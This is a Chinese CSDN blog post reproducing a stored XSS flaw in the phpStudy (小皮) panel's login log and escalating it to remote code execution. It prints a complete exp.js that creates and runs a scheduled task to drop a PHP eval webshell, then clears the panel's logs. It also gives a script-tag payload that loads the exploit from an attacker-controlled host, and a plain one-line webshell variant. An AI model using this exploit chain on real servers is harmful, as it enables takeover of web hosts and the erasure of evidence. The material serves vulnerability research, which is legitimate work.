phpstudy_小皮面板XSS到RCE

最新推荐文章于 2024-03-19 02:07:40 发布
最新推荐文章于 2024-03-19 02:07:40 发布
阅读量616 收藏
点赞数 2
分类专栏: 代码审计与分析 文章标签: 漏洞复现 代码审计 web安全 phpstudy小皮
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RestoreJustice/article/details/129735449
版权

phpstudy_小皮面板XSS到RCE

一、简介

​ phpStudy小皮面板用户登录日志存在存储型XSS漏洞,利用存储型XSS攻击者可以通过JS调用面板中的计划任务执行系统命令。

二、影响版本

  • 小皮windows面板V0.102以及以下版本
  • 小皮linux面板X1.29以及以下版本
  • 截止2023.3.8日,我测试发现官网对漏洞进行了修复,但未发布修复说明,也未更新版本号

三、漏洞复现

安装完成后来到登录页面,复制好相关后台连接和用户名密码后进行正常登录。

漏洞验证:

在用户登录页面用户名处插入xss语句,进行登录,产生登录日志。

注意:验证码需要写对

在这里插入图片描述

提示用户名或者密码错误,此时产生了登录日志,写入了XSS语句。日志会记录登录失败的用户名,并在登录后将尝试的用户名直接显示在小皮首页当中,而这个过程是没有过滤的,也就可以进行任意xss。

在这里插入图片描述

使用正确的账户密码登录,触发弹窗

在这里插入图片描述
在这里插入图片描述

XSS到RCE

利用XSS配合小皮自带的计划任务,实现后台添加计划任务实现写webshell、反弹shell等操作,这些交给js就可以实现自动化完成。

exp.js

function exp() {
    $.ajax({
        url: '/service/app/tasks.php?type=task_list',   //获取计划任务列表
        type: 'GET',
        headers:{
            "X-Requested-With": "XMLHttpRequest"
        },
        dataType: 'json',
        success: function (data) {
            var id = data.data[0].ID;    //任务名称
            $.ajax({
                url: '/service/app/tasks.php?type=exec_task',     //执行计划任务
                type: 'POST',
                headers:{
                    "X-Requested-With": "XMLHttpRequest",
                    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
                },
                data: { tid: id },
                dataType: 'json',
                success: function (res) {
                    $.ajax({
                        url: '/service/app/log.php?type=clearlog',
                        type: 'POST',
                        data: { type: 'clearlog' },
                        dataType: 'json',
                        success: function (res2) {}
                    });
                }
            });
        }
    });
}

function save() {
    var data = new Object();
    data.task_id = '';
    data.title = 'shell_title';
    data.exec_cycle = '5';
    data.week = '1';
    data.day = '3';
    data.hour = '1';
    data.minute = '1';
    data.shell = 'echo "PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTs/Pg==" | base64 -d > C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/shell.php';    //要执行的命令
    $.ajax({
        url: '/service/app/tasks.php?type=save_shell',
        type: 'POST',
        headers:{
            "X-Requested-With": "XMLHttpRequest",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
        },
        data: data,
        dataType: 'json',
        success: function (res) {
            exp();
        }
    });
}

save();

这里把shell写入到小皮网站目录中

默认是安装在D盘,我这里改成了C盘
C:\xp.cn\www\wwwroot\admin\localhost_80\wwwroot

构造payload

<script src="http://192.168.83.130:8080/exp.js"></script>

成功创建计划命令
在这里插入图片描述
在这里插入图片描述

成功写入
在这里插入图片描述
在这里插入图片描述

我测试时,不能使用base64编码一句话,不然写不进去

'echo "<?php @eval($_POST[123]);?>" >D:/phpstudyweb/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/webshell.php';

参考:https://www.freebuf.com/vuls/356878.html

网安复现系列:phpStudy 小皮 Windows/Linux 面板 XSSRCE漏洞
weixin_54626591的博客
05-06 186
phpStudy 小皮 Windows/Linux 面板 XSSRCE漏洞
漏洞复现phpStudy 小皮 Windows面板 RCE漏洞
做自己喜欢的事,并将其发挥到极致!
02-09 5477
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE
小皮面板rce漏洞
weixin_61785633的博客
03-31 445
Linux也有不少规则,我们如果就按这种写法就会出现报错,不过我们却可以用双引号闭合,它只会把双引号所包含的数据写进文件中。这种方式,不过这也没关系,因为我们知道其实$_POST[]里面也有不用引号闭合的方式,那就是输入数字,变成$_POST[123],ok这下就修改完成了,后面在改改文件所在位置就行了,别文件传进去了,却访问不到木马文件。这就是我们当时登录时,所留下的记录,本来可以通过这个日志,知道有谁尝试登录过我们的小皮面板,但我们输入的js代码,会被它解析并运行,这就导致了xss漏洞
phpstudy_小皮Web面板_RCE漏洞
Ryan的博客
02-08 528
最近爆出phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE
PhpStudy小皮面板服务搭建
QuJJan的博客
03-12 1621
系统:Rocky Linux 8.6搭建目的:实现web服务的简单切换与应用安装条件:虚拟机(VMware 17 Pro)能联网,能ping通phpstudy是一个php运行环境的集成包,用户不需要去配置运行环境,就可以使用,phpstudy不仅是一款比较好用的php调试环境工具,并且还包括了开发工具和常用手册,是国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。
小皮软件PHPStudy搭建Laravel 10.X框架
qq_54050785的博客
03-08 3008
小皮软件PHPStudy搭建Laravel 10.X 框架详细步骤
应用工具推荐phpStudy小皮面板
Muscleheng的博客
03-22 2万+
推荐应用:官网地址 xp.cn 小皮面板(PhpStudy)真是一个好东西,集成了各种常用应用,一般当我们拿到一台全新的电脑,为了满足日常本地使用,都会安装一堆应用,例如:MySQL,Redis,Nginx、ftp客户端等等。 这个时候,安装一个小皮面板(PhpStudy)应用就相当于安装了一批我们常用的应用,例如: MySQL、Redis、Nginx、Apache、ftp客户端、PHP、HeidiSQL数据库客户端等等,而且可以随意选择版本进行安装 大致界面如下: 1.主界面 PhpS..
小皮Phpstudy面板存在任意命令执行漏洞-公开版本
最新发布
04-20
- 小皮面板默认在9080端口开放了一个需要授权码的登录接口。然而,通过设置HTTP请求头部`X-Requested-With: XMLHttpRequest`,攻击者可以绕过这一限制,直接访问管理界面。 - 示例请求头: `header="Server: xp...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5539
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
渗透测试环境搭建PHPstudy+Pikachu
came_861的博客
12-20 293
渗透测试环境搭建PHPstudy+Pikachu
php小皮风格 php小皮风格
08-09
php小皮风格 php小皮风格 php小皮风格 php小皮风格
phpstudy 小皮web面板 RCE漏洞
Websec
02-23 1523
这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。紧接着该系统的后台有一个计划任务功能,其中可以执行系统命令,所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。可以看到确实触发弹窗了,这是因为整个系统在加载的时候会读取操作日志的内容,因为刚才已经插入了弹窗的xss代码,所以这里执行显示了。只要管理员登录到系统,我们插入的xss代码即可写入计划任务并执行,通过计划任务就可以在服务器上写入文件。访问系统登录面板,页面显示如下。
小皮面板RCE复现
qq_32660043的博客
02-07 206
免责声明:文中提到的所有技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!
PHP小皮使用
热门推荐
qq_42934208的博客
11-15 2万+
php小皮使用
PHP小皮使用教程
qq_72764409的博客
12-22 1254
随着快爱情的发展,php也不是那么的繁琐,下载集成工具小皮就可以省去很多时间包含,更重要的是可视化快速部署,功能齐全,安全稳定、不断更新,当然也可以选择其他的集成工具,这边只介绍小皮的使用教程,萌新级教程一、官网下载小皮1.下载的网址是:小皮面板(phpstudy) - 让天下没有难配的服务器环境!2.下载好之后点击.exe 文件进行安装安装路径不要有中文和空格,尽量别装到c盘(一般直接改默认路径的盘符,直接修改为d)二、使用步骤1.打开小皮页面2.使用步骤如下注:点击确定会用一个提示。
第二篇:MySQL安装与配置(基于小皮面板phpstudy))
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
02-05 7322
在第一篇中介绍了数据库的相关概念,了解到SQL是用来操作数据库管理系统的语言,因此要学习数据库技术,数据库管理系统的配备是必不可少的!并且出于与的双考量而选择这款数据库管理系统软件。
【PHP小皮】使用教程
weixin_59011476的博客
09-05 1万+
随着快爱情的发展,php也不是那么的繁琐,下载集成工具小皮就可以省去很多时间包含,更重要的是可视化快速部署,功能齐全,安全稳定、不断更新,当然也可以选择其他的集成工具,这边只介绍小皮的使用教程,萌新级教程提示:以下是本篇文章正文内容,下面案例可供参考提示:这里对其进行总结:以上就是PHP小皮的使用教程,本文仅仅简单介绍了如何使用小皮,想了解更多的可以到这个官网手册phpStudy V8 简介 - phpStudy V8 使用手册 (xp.cn)暗网。
phpstudy小皮Windows面板RCE漏洞
今天是几号的博客
04-01 693
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE
PHP-小皮创建php网站中遇到的问题及解决方案—我耀学IT
2301_78414876的博客
03-19 3402
可能电脑中存在mysql数据库,并且服务处于开启状态,这种情况下我们可以用鼠标右键单击windows按钮->选择计算机管理->打开后在左侧找到服务与应用程序->点击其下方的服务选项->找到mysql服务->选中后单击鼠标右键将其停止->最后重新启动小皮中的服务器与数据库。手动在hosts文件中添加我们新创建的网站。选中hosts文件并通过鼠标右键单击->点击属性->选择安全选项卡->点击编辑按钮->在组或用户名中选择Users选项->在对应的权限中将写入权限打上对勾->点击确定按钮->点击外层确定按钮。
快速掌握PHPstudy小皮面板安装与配置全攻略
PHPstudy小皮面板以其易用性、高效性和全面的功能,成为PHP开发者不可或缺的工具,无论是初学者还是经验丰富的开发者,都能从中受益。通过合理的使用和配置,用户能够快速部署和维护自己的PHP应用,提升开发体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值